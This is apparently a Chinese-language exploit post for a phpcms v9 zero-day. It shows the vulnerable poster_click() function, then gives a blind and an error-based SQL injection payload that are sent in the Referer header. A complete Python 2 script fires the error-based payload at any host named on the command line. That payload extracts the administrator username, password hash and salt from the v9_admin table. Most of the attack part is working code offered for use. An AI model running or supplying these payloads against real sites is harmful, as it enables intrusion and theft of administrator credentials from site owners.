有人放出了 phpcms v9 的 0day,就随手写了个利用代码。其中注入代码有两种形式:
问题函数:\phpcms\modules\poster\index.php(注入点是 Referer 头,经 HTTP_REFERER 常量直接进入 insert;另外 $_GET['url'] 未经校验就进入 Location 头,是一个开放重定向)
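/**
 * Records a click on the poster (advert) selected by $_GET['id'] and
 * redirects the browser to the poster's link.
 *
 * Reads: $_GET['id'], $_GET['siteid'], $_GET['url'], the 'username' cookie,
 * the client IP (ip()) and the Referer header via the HTTP_REFERER constant
 * (presumably built from $_SERVER['HTTP_REFERER']; its definition is not
 * visible here).
 * Writes: one row into the click-statistics table ($this->s_db) and a
 * 'clicks' +1 on the poster row ($this->db).
 *
 * @return bool|void false when no poster row matches $id; otherwise sends a
 *                   Location header and returns nothing.
 */
public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // No such poster: nothing is logged and nothing is redirected.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // SECURITY: HTTP_REFERER (Referer request header) and $username
        // (cookie) are attacker-controlled and are handed to insert() as-is.
        // Whether insert() escapes its values is not visible in this file;
        // the accompanying write-up reports that it does not, which makes
        // 'referer' an SQL injection sink. Confirm against the db class and
        // escape/parameterise these values before they reach the query.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // Multi-link poster: the request may choose the target with ?url=,
        // but only a link configured for this poster is accepted. The
        // original code redirected to any $_GET['url'] (open redirect).
        $url = $setting['1']['linkurl'];
        if (isset($_GET['url'])) {
            foreach ($setting as $item) {
                if (is_array($item) && isset($item['linkurl']) && $item['linkurl'] === $_GET['url']) {
                    $url = $_GET['url'];
                    break;
                }
            }
        }
    }
    header('Location: '.$url);
}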
利用方式:
1、可以采用盲注的手法,把 payload 放在 Referer 头里(闭合 referer 字段后补齐 clicktime、type 两个值,再用 # 注释掉剩余语句):

referer: 1',(select password from v9_admin where userid=1 and substr(password,4)='xxoo'),'1')#
通过返回页面正常与否,逐段猜解密码字段。
2、代码是花开写的,随手附上:

1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
此方法是报错注入手法:rand(0) 配合 group by 时,MySQL 向临时表写入分组键会重复计算 floor(rand(0)*2),产生重复键并抛出 "Duplicate entry '...' for key" 错误,拼接在键里的子查询结果就随错误信息回显。注意该子查询没有 LIMIT,当 v9_admin 多于一行时 MySQL 会报 "Subquery returns more than 1 row" 而不是泄露数据;旧版 MySQL 还会把错误信息中的键值截断到 64 个字符。
利用程序(Python 2;只有当 id 对应的广告存在时 insert 才会执行,所以 id 必须是一个有效的广告 id):
#!/usr/bin/env python
import httplib
import re
import sys
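def attack():
    """Fire the error-based injection at the target named on the command line.

    Expects sys.argv[1] = host (e.g. "www.example.org") and sys.argv[2] =
    path prefix of the phpcms install ("/" or "/phpcmsv9/"). The payload is
    sent in the Referer header of a GET to
    index.php?m=poster&c=index&a=poster_click. The vulnerable function only
    runs the INSERT when the poster id exists, so id=2 must be a real poster
    on the target; sitespaceid is not read by poster_click() and is kept only
    because the original request carried it.

    On success MySQL's "Duplicate entry '...'" error echoes
    username_password_encrypt from v9_admin and the first match is printed.
    When the response carries no such error (patched target, non-MySQL
    backend, missing poster, or more than one admin row, which makes the
    subquery fail with a different error) a notice is printed instead of
    crashing on an empty match list.

    Network errors from httplib are not caught and propagate to the caller.
    """
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    host = sys.argv[1]
    prefix = sys.argv[2]
    # Closes the 'referer' value, supplies the two remaining columns
    # (clicktime, type) and comments out the rest of the INSERT.
    payload = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
               "(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a "
               "from information_schema.tables group by a)b),'1')#")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        "Referer": payload,
    }
    conn = httplib.HTTPConnection(host)
    try:
        conn.request("GET",
                     prefix + "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2",
                     headers=headers)
        body = conn.getresponse().read()
    finally:
        # Always release the socket, even if the request or read raised.
        conn.close()
    leaks = re.findall(r"Duplicate entry '\w+'", body)
    if leaks:
        print(leaks[0])
    else:
        print("No 'Duplicate entry' error in the response; target may not be vulnerable.")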
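if __name__ == "__main__":
    # Both the host and the install path prefix are required; anything less
    # prints usage and exits with a non-zero status.
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("    phpcmsattack.py www.paxmac.org /")
        print("    phpcmsattack.py www.paxmac.org /phpcmsv9/")
        sys.exit(1)
    attack()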